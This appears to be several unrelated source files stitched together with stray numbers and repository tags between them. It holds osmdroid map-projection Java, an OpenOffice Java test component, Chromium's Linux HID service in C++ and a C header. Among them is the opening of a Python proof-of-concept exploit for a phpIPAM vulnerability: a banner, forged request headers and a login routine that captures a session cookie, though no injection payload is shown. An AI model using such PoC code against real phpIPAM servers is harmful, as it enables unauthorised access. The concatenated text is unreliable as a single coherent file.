? pReuse : new Rect(); out.left = TileSystem.truncateToInt(getLongPixelXFromMercator(getMercatorFromTile(pTileX), false)); out.top = TileSystem.truncateToInt(getLongPixelYFromMercator(getMercatorFromTile(pTileY), false)); out.right = TileSystem.truncateToInt(getLongPixelXFromMercator(getMercatorFromTile(pTileX + 1), false)); out.bottom = TileSystem.truncateToInt(getLongPixelYFromMercator(getMercatorFromTile(pTileY + 1), false)); return out; } /** * @since 6.0.0 */ public long getMercatorFromTile(final int pTile) { return TileSystem.getMercatorFromTile(pTile, mTileSize); } /** * This will provide a Matrix that will revert the current map's scaling and rotation. This can * be useful when drawing to a fixed location on the screen. */ public Matrix getScaleRotateCanvasMatrix() { return mRotateAndScaleMatrix; } /** * @since 6.0.0 */ public double getProjectedPowerDifference() { return mProjectedMapSize / getWorldMapSize(); } /** * @since 6.0.0 * @deprecated Use {@link #getLongPixelsFromProjected(PointL, double, boolean, PointL)} instead */ @Deprecated public Point getPixelsFromProjected(final PointL in, final double powerDifference, final Point reuse) { final Point out = reuse != null ? reuse : new Point(); final PointL tmp = new PointL(); getLongPixelsFromProjected(in, powerDifference, true, tmp); out.x = TileSystem.truncateToInt(tmp.x); out.y = TileSystem.truncateToInt(tmp.y); return out; } /** * @param in Input point: a geo point projected to the map with the largest zoom level (aka "projected" map) * @param powerDifference Factor between the large "projected" map and the wanted projection zoom level * @param pCloser "Should we move the resulting point - modulo the map size - so that it's * as close to the screen limits as possible?" * @since 6.0.0 */ public PointL getLongPixelsFromProjected(final PointL in, final double powerDifference, final boolean pCloser, final PointL reuse) { final PointL out = reuse != null ? reuse : new PointL(); out.x = getLongPixelXFromMercator((long) (in.x / powerDifference), pCloser); out.y = getLongPixelYFromMercator((long) (in.y / powerDifference), pCloser); return out; } /** * @since 6.0.0 * Correction of pixel value. * Pixel values are identical, modulo mapSize. * What we explicitly want is either: * * the visible pixel that is the closest to the left (first choice) * * the invisible pixel that is the closest to the screen center */ private long getCloserPixel(long pPixel, final int pScreenLimitFirst, final int pScreenLimitLast, final double pMapSize) { final long center = (pScreenLimitFirst + pScreenLimitLast) / 2; long previous = 0; if (pPixel < pScreenLimitFirst) { while (pPixel < pScreenLimitFirst) { previous = pPixel; pPixel += pMapSize; } if (pPixel < pScreenLimitLast) { return pPixel; } if (Math.abs(center - pPixel) < Math.abs(center - previous)) { return pPixel; } return previous; } while (pPixel >= pScreenLimitFirst) { previous = pPixel; pPixel -= pMapSize; } if (previous < pScreenLimitLast) { return previous; } if (Math.abs(center - pPixel) < Math.abs(center - previous)) { return pPixel; } return previous; } /** * @since 6.0.0 */ private long getLongPixelXFromMercator(final long pMercatorX, final boolean pCloser) { return getLongPixelFromMercator(pMercatorX, pCloser, mOffsetX, mIntrinsicScreenRectProjection.left, mIntrinsicScreenRectProjection.right); } /** * @since 6.0.0 */ private long getLongPixelYFromMercator(final long pMercatorY, final boolean pCloser) { return getLongPixelFromMercator(pMercatorY, pCloser, mOffsetY, mIntrinsicScreenRectProjection.top, mIntrinsicScreenRectProjection.bottom); } /** * @since 6.0.0 */ private long getLongPixelFromMercator(final long pMercator, final boolean pCloser, final long pOffset, final int pScreenLimitFirst, final int pScreenLimitLast) { long result = pMercator + pOffset; if (pCloser) { result = getCloserPixel(result, pScreenLimitFirst, pScreenLimitLast, mMercatorMapSize); } return result; } /** * @since 6.0.0 */ public int getTileFromMercator(final long pMercator) { return TileSystem.getTileFromMercator(pMercator, mTileSize); } /** * @since 6.0.0 */ public RectL getMercatorViewPort(final RectL pReuse) { final RectL out = pReuse != null ? pReuse : new RectL(); // in the standard case, that's all we need: the screen rect corners float left = mIntrinsicScreenRectProjection.left; float right = mIntrinsicScreenRectProjection.right; float top = mIntrinsicScreenRectProjection.top; float bottom = mIntrinsicScreenRectProjection.bottom; // sometimes we need to expand beyond in order to get all visible tiles if (mOrientation != 0) { final float scaleRotatePoints[] = new float[8]; scaleRotatePoints[0] = mIntrinsicScreenRectProjection.left; scaleRotatePoints[1] = mIntrinsicScreenRectProjection.top; scaleRotatePoints[2] = mIntrinsicScreenRectProjection.right; scaleRotatePoints[3] = mIntrinsicScreenRectProjection.bottom; scaleRotatePoints[4] = mIntrinsicScreenRectProjection.left; scaleRotatePoints[5] = mIntrinsicScreenRectProjection.bottom; scaleRotatePoints[6] = mIntrinsicScreenRectProjection.right; scaleRotatePoints[7] = mIntrinsicScreenRectProjection.top; mUnrotateAndScaleMatrix.mapPoints(scaleRotatePoints); for (int i = 0; i < 8; i += 2) { if (left > scaleRotatePoints[i]) { left = scaleRotatePoints[i]; } if (right < scaleRotatePoints[i]) { right = scaleRotatePoints[i]; } if (top > scaleRotatePoints[i + 1]) { top = scaleRotatePoints[i + 1]; } if (bottom < scaleRotatePoints[i + 1]) { bottom = scaleRotatePoints[i + 1]; } } } out.left = getMercatorXFromPixel((int) left); out.top = getMercatorYFromPixel((int) top); out.right = getMercatorXFromPixel((int) right); out.bottom = getMercatorYFromPixel((int) bottom); return out; } /** * @since 6.0.0 */ public int getScreenCenterX() { return (mIntrinsicScreenRectProjection.right + mIntrinsicScreenRectProjection.left) / 2 + mMapCenterOffsetX; } /** * @since 6.0.0 */ public int getScreenCenterY() { return (mIntrinsicScreenRectProjection.bottom + mIntrinsicScreenRectProjection.top) / 2 + mMapCenterOffsetY; } /** * @since 6.0.0 */ public long getMercatorXFromPixel(final int pPixelX) { return pPixelX - mOffsetX; } /** * @since 6.0.0 */ public long getMercatorYFromPixel(final int pPixelY) { return pPixelY - mOffsetY; } /** * @since 6.0.0 */ public long getCleanMercator(final long pMercator, final boolean wrapEnabled) { return mTileSystem.getCleanMercator(pMercator, mMercatorMapSize, wrapEnabled); } /** * @since 6.0.0 */ public GeoPoint getCurrentCenter() { return mCurrentCenter; } public long getOffsetX() { return mOffsetX; } public long getOffsetY() { return mOffsetY; } /** * @since 6.0.0 */ public void save(final Canvas pCanvas, final boolean pMapRotation, final boolean pForce) { if (mOrientation != 0 || pForce) { pCanvas.save(); pCanvas.concat(pMapRotation ? mRotateAndScaleMatrix : mUnrotateAndScaleMatrix); } } /** * @since 6.0.0 */ public void restore(final Canvas pCanvas, final boolean pForce) { if (mOrientation != 0 || pForce) { pCanvas.restore(); } } /** * @since 6.0.0 */ private void refresh() { // of course we could write mIntrinsicScreenRectProjection.centerX() and centerY() // but we should keep writing it that way (cf. ProjectionTest) fromPixels(getScreenCenterX(), getScreenCenterY(), mCurrentCenter); if (mOrientation != 0 && mOrientation != 180) { GeometryMath.getBoundingBoxForRotatatedRectangle( mIntrinsicScreenRectProjection, getScreenCenterX(), getScreenCenterY(), mOrientation, mScreenRectProjection); } else { // of course we could write mScreenRectProjection.set(mIntrinsicScreenRectProjection); // but we should keep writing it that way (cf. ProjectionTest) mScreenRectProjection.left = mIntrinsicScreenRectProjection.left; mScreenRectProjection.top = mIntrinsicScreenRectProjection.top; mScreenRectProjection.right = mIntrinsicScreenRectProjection.right; mScreenRectProjection.bottom = mIntrinsicScreenRectProjection.bottom; } IGeoPoint neGeoPoint = fromPixels( mScreenRectProjection.right, mScreenRectProjection.top, null, true); final TileSystem tileSystem = org.osmdroid.views.MapView.getTileSystem(); if (neGeoPoint.getLatitude() > tileSystem.getMaxLatitude()) { neGeoPoint = new GeoPoint(tileSystem.getMaxLatitude(), neGeoPoint.getLongitude()); } if (neGeoPoint.getLatitude() < tileSystem.getMinLatitude()) { neGeoPoint = new GeoPoint(tileSystem.getMinLatitude(), neGeoPoint.getLongitude()); } IGeoPoint swGeoPoint = fromPixels( mScreenRectProjection.left, mScreenRectProjection.bottom, null, true); if (swGeoPoint.getLatitude() > tileSystem.getMaxLatitude()) { swGeoPoint = new GeoPoint(tileSystem.getMaxLatitude(), swGeoPoint.getLongitude()); } if (swGeoPoint.getLatitude() < tileSystem.getMinLatitude()) { swGeoPoint = new GeoPoint(tileSystem.getMinLatitude(), swGeoPoint.getLongitude()); } mBoundingBoxProjection.set( neGeoPoint.getLatitude(), neGeoPoint.getLongitude(), swGeoPoint.getLatitude(), swGeoPoint.getLongitude()); } /** * Adjust the offsets so that this geo point projects into that pixel * * @since 6.0.0 */ public void adjustOffsets(final IGeoPoint pGeoPoint, final PointF pPixel) { if (pPixel == null) { return; } if (pGeoPoint == null) { return; } final Point unRotatedExpectedPixel = unrotateAndScalePoint((int) pPixel.x, (int) pPixel.y, null); final Point unRotatedActualPixel = toPixels(pGeoPoint, null); final long deltaX = unRotatedExpectedPixel.x - unRotatedActualPixel.x; final long deltaY = unRotatedExpectedPixel.y - unRotatedActualPixel.y; adjustOffsets(deltaX, deltaY); } /** * Adjust the offsets so that * either this bounding box is bigger than the screen and contains it * or it is smaller and it is centered * * @since 6.0.0 * @deprecated Use {@link #adjustOffsets(double, double, boolean, int)} instead */ @Deprecated public void adjustOffsets(final BoundingBox pBoundingBox) { if (pBoundingBox == null) { return; } adjustOffsets(pBoundingBox.getLonWest(), pBoundingBox.getLonEast(), false, 0); adjustOffsets(pBoundingBox.getActualNorth(), pBoundingBox.getActualSouth(), true, 0); } /** * Adjust offsets so that north and south (if latitude, west and east if longitude) * actually "fit" into the screen, with a tolerance of extraSize pixels. * Used in order to ensure scroll limits. * * @since 6.0.0 */ void adjustOffsets(final double pNorthOrWest, final double pSouthOrEast, final boolean isLatitude, final int pExtraSize) { final long min; final long max; final long deltaX; final long deltaY; if (isLatitude) { min = getLongPixelYFromLatitude(pNorthOrWest); max = getLongPixelYFromLatitude(pSouthOrEast); deltaX = 0; deltaY = getScrollableOffset(min, max, mMercatorMapSize, mIntrinsicScreenRectProjection.height(), pExtraSize); } else { min = getLongPixelXFromLongitude(pNorthOrWest); max = getLongPixelXFromLongitude(pSouthOrEast); deltaX = getScrollableOffset(min, max, mMercatorMapSize, mIntrinsicScreenRectProjection.width(), pExtraSize); deltaY = 0; } adjustOffsets(deltaX, deltaY); } /** * @since 6.0.0 */ void adjustOffsets(final long pDeltaX, final long pDeltaY) { if (pDeltaX == 0 && pDeltaY == 0) { return; } mOffsetX += pDeltaX; mOffsetY += pDeltaY; mScrollX -= pDeltaX; mScrollY -= pDeltaY; refresh(); } /** * @param pPixelMin Pixel position of the limit (left) * @param pPixelMax Pixel position of the limit (right) * @param pWorldSize World map size - for modulo adjustments * @param pScreenSize Screen size * @param pExtraSize Extra size to consider at each side of the screen * @return the offset to apply so that the limits are within the screen * @since 6.0.0 */ public static long getScrollableOffset(final long pPixelMin, long pPixelMax, final double pWorldSize, final int pScreenSize, final int pExtraSize) { while (pPixelMax - pPixelMin < 0) { // date line + several worlds fix pPixelMax += pWorldSize; } long delta; if (pPixelMax - pPixelMin < pScreenSize - 2 * pExtraSize) { final long half = (pPixelMax - pPixelMin) / 2; if ((delta = pScreenSize / 2 - half - pPixelMin) > 0) { return delta; } if ((delta = pScreenSize / 2 + half - pPixelMax) < 0) { return delta; } return 0; } if ((delta = pExtraSize - pPixelMin) < 0) { return delta; } if ((delta = pScreenSize - pExtraSize - pPixelMax) > 0) { return delta; } return 0; } /** * @since 6.0.0 */ boolean setMapScroll(final MapView pMapView) { if (pMapView.getMapScrollX() == mScrollX && pMapView.getMapScrollY() == mScrollY) { return false; } pMapView.setMapScroll(mScrollX, mScrollY); return true; } /** * @since 6.1.0 */ public boolean isHorizontalWrapEnabled() { return horizontalWrapEnabled; } /** * @since 6.1.0 */ public boolean isVerticalWrapEnabled() { return verticalWrapEnabled; } /** * @since 6.1.0 */ public float getOrientation() { return mOrientation; } /** * @since 6.1.0 */ public int getWidth() { return mIntrinsicScreenRectProjection.width(); } /** * @since 6.1.0 */ public int getHeight() { return mIntrinsicScreenRectProjection.height(); } /** * @since 6.2.0 */ public double getWorldMapSize() { return mMercatorMapSize; } }
13,431
421
import sys import urllib3 urllib3.disable_warnings() def banner(): print(""" ___ _ _ ____ ___ ___ ___ ___ ___ ___ ___ __ _ / __)( \/ )( ___)___(__ \ / _ \(__ \ (__ \ ___(__ \ (__ ) / _ \ /. | / ) ( (__ \ / )__)(___)/ _/( (_) )/ _/ / _/(___)/ _/ (_ \( (_) )(_ _)/ _ \\ \___) \/ (____) (____)\___/(____)(____) (____)(___/ \___/ (_) \___/ """) print(" Vulnerability discovered by <NAME>") print(" PoC author: @javicarabantes") def generate_headers(csrftoken, phpipam_session): return { "Host": "localhost:8888", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Content-Length": "214", "Origin": "http://localhost:8888", "Connection": "close", "Referer": "http://localhost:8888/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "Cookie": f"csrftoken={csrftoken}; dojo-sidebar=max; phpipam={phpipam_session}; table-page-size=50", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin" } def get_bgp_id(): # Does not seem to be a requirement in phpipam 1.4.3 and 1.4.4 return 1 def login(session, login_url, ipamusername, ipampassword, csrftoken): headers = generate_headers(None, None) # We don't need the cookie for login headers.pop("Cookie") payload = { "ipamusername": ipamusername, "ipampassword": <PASSWORD> } response = session.post(login_url, data=payload, headers=headers, verify=False) if response.status_code == 200: if "Invalid username" in response.text: print("Bad credentials") sys.exit(1) if len(session.cookies.get_dict()) > 0 and "phpipam" in session.cookies.get_dict(): return session.cookies.get_dict()['phpipam'] else: print("no phpipam session returned") sys.exit(1) else: print(f"Status code was {response.status_code}. Check the URL") sys.exit(1) def fetch_csrf_token(): # Does not seem to be a requirement in phpipam 1.4.3 and 1.4.4 return None
1,184
679
<gh_stars>100-1000 /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ package test.cppuhelper.propertysetmixin.comp; import com.sun.star.beans.Ambiguous; import com.sun.star.beans.Defaulted; import com.sun.star.beans.Optional; import com.sun.star.beans.UnknownPropertyException; import com.sun.star.beans.PropertyValue; import com.sun.star.beans.PropertyVetoException; import com.sun.star.beans.XFastPropertySet; import com.sun.star.beans.XPropertyAccess; import com.sun.star.beans.XPropertyChangeListener; import com.sun.star.beans.XPropertySet; import com.sun.star.beans.XPropertySetInfo; import com.sun.star.beans.XVetoableChangeListener; import com.sun.star.comp.loader.FactoryHelper; import com.sun.star.lang.WrappedTargetException; import com.sun.star.lang.XComponent; import com.sun.star.lang.XEventListener; import com.sun.star.lang.XMultiServiceFactory; import com.sun.star.lang.XSingleServiceFactory; import com.sun.star.lib.uno.helper.WeakBase; import com.sun.star.lib.uno.helper.PropertySetMixin; import com.sun.star.registry.XRegistryKey; import com.sun.star.uno.Any; import com.sun.star.uno.IQueryInterface; import com.sun.star.uno.Type; import com.sun.star.uno.XComponentContext; import test.cppuhelper.propertysetmixin.XSupplier; import test.cppuhelper.propertysetmixin.XTest3; public final class JavaSupplier extends WeakBase implements XSupplier { public JavaSupplier(XComponentContext context) { this.context = context; } public XComponent getEmpty1() { return new Empty1(); } public XComponent getEmpty2() { return new Empty2(); } public XTest3 getFull() { return new Full(); } public static XSingleServiceFactory __getServiceFactory( String implName, XMultiServiceFactory multiFactory, XRegistryKey regKey) { return implName.equals(implementationName) ? FactoryHelper.getServiceFactory( JavaSupplier.class, serviceName, multiFactory, regKey) : null; } private static final String implementationName = JavaSupplier.class.getName(); private static final String serviceName = "test.cppuhelper.propertysetmixin.JavaSupplier"; private final class Empty1 extends WeakBase implements XComponent { public Empty1() {} public void dispose() { prop.dispose(); } public void addEventListener(XEventListener listener) {} public void removeEventListener(XEventListener listener) {} private final PropertySetMixin prop = new PropertySetMixin( context, this, new Type(XComponent.class), null); } private final class Empty2 extends WeakBase implements XComponent, XPropertySet, XFastPropertySet, XPropertyAccess { public Empty2() {} public void dispose() { prop.dispose(); } public void addEventListener(XEventListener listener) {} public void removeEventListener(XEventListener listener) {} public com.sun.star.beans.XPropertySetInfo getPropertySetInfo() { return prop.getPropertySetInfo(); } public void setPropertyValue(String propertyName, Object value) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setPropertyValue(propertyName, value); } public Object getPropertyValue(String propertyName) throws UnknownPropertyException, WrappedTargetException { return prop.getPropertyValue(propertyName); } public void addPropertyChangeListener( String propertyName, XPropertyChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.addPropertyChangeListener(propertyName, listener); } public void removePropertyChangeListener( String propertyName, XPropertyChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.removePropertyChangeListener(propertyName, listener); } public void addVetoableChangeListener( String propertyName, XVetoableChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.addVetoableChangeListener(propertyName, listener); } public void removeVetoableChangeListener( String propertyName, XVetoableChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.removeVetoableChangeListener(propertyName, listener); } public void setFastPropertyValue(int handle, Object value) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setFastPropertyValue(handle, value); } public Object getFastPropertyValue(int handle) throws UnknownPropertyException, WrappedTargetException { return prop.getFastPropertyValue(handle); } public PropertyValue[] getPropertyValues() { return prop.getPropertyValues(); } public void setPropertyValues(PropertyValue[] props) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setPropertyValues(props); } private final PropertySetMixin prop = new PropertySetMixin( context, this, new Type(XComponent.class), null); } private final class Full extends WeakBase implements XTest3, XPropertySet, XFastPropertySet, XPropertyAccess { public Full() {} public synchronized int getFirst() { return a1; } public void setFirst(int value) { prop.prepareSet("First", null); synchronized (this) { a1 = value; } } public synchronized Ambiguous getSecond() throws UnknownPropertyException { return a2; } public void setSecond(Ambiguous value) throws PropertyVetoException, UnknownPropertyException { PropertySetMixin.BoundListeners l = new PropertySetMixin.BoundListeners(); prop.prepareSet( "Second", Any.VOID, (((Optional) ((Defaulted) value.Value).Value).IsPresent ? ((Optional) ((Defaulted) value.Value).Value).Value : Any.VOID), l); synchronized (this) { a2 = value; } l.notifyListeners(); } public int getThird() throws UnknownPropertyException { throw new UnknownPropertyException("Third", this); } public void setThird(int value) throws UnknownPropertyException { throw new UnknownPropertyException("Third", this); } public int getFourth() throws UnknownPropertyException { throw new UnknownPropertyException("Fourth", this); } public void setFourth(int value) throws UnknownPropertyException { throw new UnknownPropertyException("Fourth", this); } public com.sun.star.beans.XPropertySetInfo getPropertySetInfo() { return prop.getPropertySetInfo(); } public void setPropertyValue(String propertyName, Object value) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setPropertyValue(propertyName, value); } public Object getPropertyValue(String propertyName) throws UnknownPropertyException, WrappedTargetException { return prop.getPropertyValue(propertyName); } public void addPropertyChangeListener( String propertyName, XPropertyChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.addPropertyChangeListener(propertyName, listener); } public void removePropertyChangeListener( String propertyName, XPropertyChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.removePropertyChangeListener(propertyName, listener); } public void addVetoableChangeListener( String propertyName, XVetoableChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.addVetoableChangeListener(propertyName, listener); } public void removeVetoableChangeListener( String propertyName, XVetoableChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.removeVetoableChangeListener(propertyName, listener); } public void setFastPropertyValue(int handle, Object value) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setFastPropertyValue(handle, value); } public Object getFastPropertyValue(int handle) throws UnknownPropertyException, WrappedTargetException { return prop.getFastPropertyValue(handle); } public PropertyValue[] getPropertyValues() { return prop.getPropertyValues(); } public void setPropertyValues(PropertyValue[] props) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setPropertyValues(props); } private final PropertySetMixin prop = new PropertySetMixin( context, this, new Type(XTest3.class), new String[] { "Third" }); private int a1 = 0; private Ambiguous a2 = new Ambiguous( new Defaulted(new Optional(), true), false); } private final XComponentContext context; }
4,203
2,151
<gh_stars>1000+ // Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "services/device/hid/hid_service_linux.h" #include <fcntl.h> #include <stdint.h> #include <limits> #include <memory> #include <string> #include <utility> #include "base/bind.h" #include "base/files/file.h" #include "base/files/file_path.h" #include "base/files/file_util.h" #include "base/files/scoped_file.h" #include "base/location.h" #include "base/macros.h" #include "base/sequence_checker.h" #include "base/sequenced_task_runner.h" #include "base/strings/string_number_conversions.h" #include "base/strings/string_split.h" #include "base/task_scheduler/post_task.h" #include "base/threading/thread_restrictions.h" #include "base/threading/thread_task_runner_handle.h" #include "build/build_config.h" #include "components/device_event_log/device_event_log.h" #include "device/udev_linux/scoped_udev.h" #include "device/udev_linux/udev_watcher.h" #include "services/device/hid/hid_connection_linux.h" #if defined(OS_CHROMEOS) #include "base/sys_info.h" #include "chromeos/dbus/dbus_thread_manager.h" #include "chromeos/dbus/permission_broker_client.h" #endif // defined(OS_CHROMEOS) namespace device { namespace { const char kHidrawSubsystem[] = "hidraw"; const char kHIDID[] = "HID_ID"; const char kHIDName[] = "HID_NAME"; const char kHIDUnique[] = "HID_UNIQ"; const char kSysfsReportDescriptorKey[] = "report_descriptor"; } // namespace struct HidServiceLinux::ConnectParams { ConnectParams(scoped_refptr<HidDeviceInfo> device_info, const ConnectCallback& callback) : device_info(std::move(device_info)), callback(callback), task_runner(base::ThreadTaskRunnerHandle::Get()), blocking_task_runner( base::CreateSequencedTaskRunnerWithTraits(kBlockingTaskTraits)) {} ~ConnectParams() {} scoped_refptr<HidDeviceInfo> device_info; ConnectCallback callback; scoped_refptr<base::SequencedTaskRunner> task_runner; scoped_refptr<base::SequencedTaskRunner> blocking_task_runner; base::ScopedFD fd; }; class HidServiceLinux::BlockingTaskHelper : public UdevWatcher::Observer { public: BlockingTaskHelper(base::WeakPtr<HidServiceLinux> service) : service_(std::move(service)), task_runner_(base::ThreadTaskRunnerHandle::Get()) { DETACH_FROM_SEQUENCE(sequence_checker_); } ~BlockingTaskHelper() override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); } void Start() { base::AssertBlockingAllowed(); DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); watcher_ = UdevWatcher::StartWatching(this); watcher_->EnumerateExistingDevices(); task_runner_->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::FirstEnumerationComplete, service_)); } private: // UdevWatcher::Observer void OnDeviceAdded(ScopedUdevDevicePtr device) override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); const char* device_path = udev_device_get_syspath(device.get()); if (!device_path) return; HidPlatformDeviceId platform_device_id = device_path; const char* subsystem = udev_device_get_subsystem(device.get()); if (!subsystem || strcmp(subsystem, kHidrawSubsystem) != 0) return; const char* str_property = udev_device_get_devnode(device.get()); if (!str_property) return; std::string device_node = str_property; udev_device* parent = udev_device_get_parent(device.get()); if (!parent) return; const char* hid_id = udev_device_get_property_value(parent, kHIDID); if (!hid_id) return; std::vector<std::string> parts = base::SplitString( hid_id, ":", base::TRIM_WHITESPACE, base::SPLIT_WANT_ALL); if (parts.size() != 3) return; uint32_t int_property = 0; if (!HexStringToUInt(base::StringPiece(parts[1]), &int_property) || int_property > std::numeric_limits<uint16_t>::max()) { return; } uint16_t vendor_id = int_property; if (!HexStringToUInt(base::StringPiece(parts[2]), &int_property) || int_property > std::numeric_limits<uint16_t>::max()) { return; } uint16_t product_id = int_property; std::string serial_number; str_property = udev_device_get_property_value(parent, kHIDUnique); if (str_property) serial_number = str_property; std::string product_name; str_property = udev_device_get_property_value(parent, kHIDName); if (str_property) product_name = str_property; const char* parent_sysfs_path = udev_device_get_syspath(parent); if (!parent_sysfs_path) return; base::FilePath report_descriptor_path = base::FilePath(parent_sysfs_path).Append(kSysfsReportDescriptorKey); std::string report_descriptor_str; if (!base::ReadFileToString(report_descriptor_path, &report_descriptor_str)) return; scoped_refptr<HidDeviceInfo> device_info(new HidDeviceInfo( platform_device_id, vendor_id, product_id, product_name, serial_number, // TODO(reillyg): Detect Bluetooth. crbug.com/443335 mojom::HidBusType::kHIDBusTypeUSB, std::vector<uint8_t>(report_descriptor_str.begin(), report_descriptor_str.end()), device_node)); task_runner_->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::AddDevice, service_, device_info)); } void OnDeviceRemoved(ScopedUdevDevicePtr device) override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); const char* device_path = udev_device_get_syspath(device.get()); if (device_path) { task_runner_->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::RemoveDevice, service_, std::string(device_path))); } } SEQUENCE_CHECKER(sequence_checker_); std::unique_ptr<UdevWatcher> watcher_; // This weak pointer is only valid when checked on this task runner. base::WeakPtr<HidServiceLinux> service_; scoped_refptr<base::SequencedTaskRunner> task_runner_; DISALLOW_COPY_AND_ASSIGN(BlockingTaskHelper); }; HidServiceLinux::HidServiceLinux() : blocking_task_runner_( base::CreateSequencedTaskRunnerWithTraits(kBlockingTaskTraits)), weak_factory_(this) { helper_ = std::make_unique<BlockingTaskHelper>(weak_factory_.GetWeakPtr()); blocking_task_runner_->PostTask( FROM_HERE, base::BindOnce(&BlockingTaskHelper::Start, base::Unretained(helper_.get()))); } HidServiceLinux::~HidServiceLinux() { blocking_task_runner_->DeleteSoon(FROM_HERE, helper_.release()); } base::WeakPtr<HidService> HidServiceLinux::GetWeakPtr() { return weak_factory_.GetWeakPtr(); } void HidServiceLinux::Connect(const std::string& device_guid, const ConnectCallback& callback) { DCHECK(thread_checker_.CalledOnValidThread()); const auto& map_entry = devices().find(device_guid); if (map_entry == devices().end()) { base::ThreadTaskRunnerHandle::Get()->PostTask( FROM_HERE, base::Bind(callback, nullptr)); return; } scoped_refptr<HidDeviceInfo> device_info = map_entry->second; auto params = std::make_unique<ConnectParams>(device_info, callback); #if defined(OS_CHROMEOS) chromeos::PermissionBrokerClient* client = chromeos::DBusThreadManager::Get()->GetPermissionBrokerClient(); DCHECK(client) << "Could not get permission broker client."; chromeos::PermissionBrokerClient::ErrorCallback error_callback = base::Bind(&HidServiceLinux::OnPathOpenError, params->device_info->device_node(), params->callback); client->OpenPath( device_info->device_node(), base::Bind(&HidServiceLinux::OnPathOpenComplete, base::Passed(&params)), error_callback); #else scoped_refptr<base::SequencedTaskRunner> blocking_task_runner = params->blocking_task_runner; blocking_task_runner->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::OpenOnBlockingThread, std::move(params))); #endif // defined(OS_CHROMEOS) } #if defined(OS_CHROMEOS) // static void HidServiceLinux::OnPathOpenComplete(std::unique_ptr<ConnectParams> params, base::ScopedFD fd) { scoped_refptr<base::SequencedTaskRunner> blocking_task_runner = params->blocking_task_runner; params->fd = std::move(fd); blocking_task_runner->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::FinishOpen, std::move(params))); } // static void HidServiceLinux::OnPathOpenError(const std::string& device_path, const ConnectCallback& callback, const std::string& error_name, const std::string& error_message) { HID_LOG(EVENT) << "Permission broker failed to open '" << device_path << "': " << error_name << ": " << error_message; callback.Run(nullptr); } #else // static void HidServiceLinux::OpenOnBlockingThread( std::unique_ptr<ConnectParams> params) { base::AssertBlockingAllowed(); scoped_refptr<base::SequencedTaskRunner> task_runner = params->task_runner; base::FilePath device_path(params->device_info->device_node()); base::File device_file; int flags = base::File::FLAG_OPEN | base::File::FLAG_READ | base::File::FLAG_WRITE; device_file.Initialize(device_path, flags); if (!device_file.IsValid()) { base::File::Error file_error = device_file.error_details(); if (file_error == base::File::FILE_ERROR_ACCESS_DENIED) { HID_LOG(EVENT) << "Access denied opening device read-write, trying read-only."; flags = base::File::FLAG_OPEN | base::File::FLAG_READ; device_file.Initialize(device_path, flags); } } if (!device_file.IsValid()) { HID_LOG(EVENT) << "Failed to open '" << params->device_info->device_node() << "': " << base::File::ErrorToString(device_file.error_details()); task_runner->PostTask(FROM_HERE, base::BindOnce(params->callback, nullptr)); return; } params->fd.reset(device_file.TakePlatformFile()); FinishOpen(std::move(params)); } #endif // defined(OS_CHROMEOS) // static void HidServiceLinux::FinishOpen(std::unique_ptr<ConnectParams> params) { base::AssertBlockingAllowed(); scoped_refptr<base::SequencedTaskRunner> task_runner = params->task_runner; if (!base::SetNonBlocking(params->fd.get())) { HID_PLOG(ERROR) << "Failed to set the non-blocking flag on the device fd"; task_runner->PostTask(FROM_HERE, base::BindOnce(params->callback, nullptr)); return; } task_runner->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::CreateConnection, std::move(params))); } // static void HidServiceLinux::CreateConnection(std::unique_ptr<ConnectParams> params) { DCHECK(params->fd.is_valid()); params->callback.Run(base::MakeRefCounted<HidConnectionLinux>( std::move(params->device_info), std::move(params->fd), std::move(params->blocking_task_runner))); } } // namespace device
4,447
488
#ifndef __UNPARSER_ASSIST_H__ #define __UNPARSER_ASSIST_H__ extern void generateModFile(SgFile *sfile); #define MOD_FILE_SUFFIX ".rmod" #endif
65
347
